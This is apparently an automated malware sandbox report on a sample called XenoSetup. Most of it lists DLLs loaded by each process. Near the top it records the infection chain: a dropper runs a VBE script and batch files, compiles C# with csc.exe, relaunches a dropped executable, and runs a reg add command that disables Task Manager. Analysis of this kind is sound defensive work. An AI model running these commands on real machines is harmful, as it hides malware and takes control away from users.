Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.cmdline"	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8dcADkVv20.bat"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4177.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCEACDD11852CD4DF0A8C4FA8867592994.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES436B.tmp" "c:\Users\user\AppData\Local\Temp\CSCF5A66DC0AE3041F58A3C1CE4B9A61B98.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES458E.tmp" "c:\Windows\System32\CSC3568A44F8D2D461ABD894E9C160B8C.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe "C:\portBrokerDll\DriverbrokerCrtDhcp.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe "C:\portBrokerDll/DriverbrokerCrtDhcp.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe "C:\portBrokerDll/DriverbrokerCrtDhcp.exe"

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Xeno.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Xeno.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
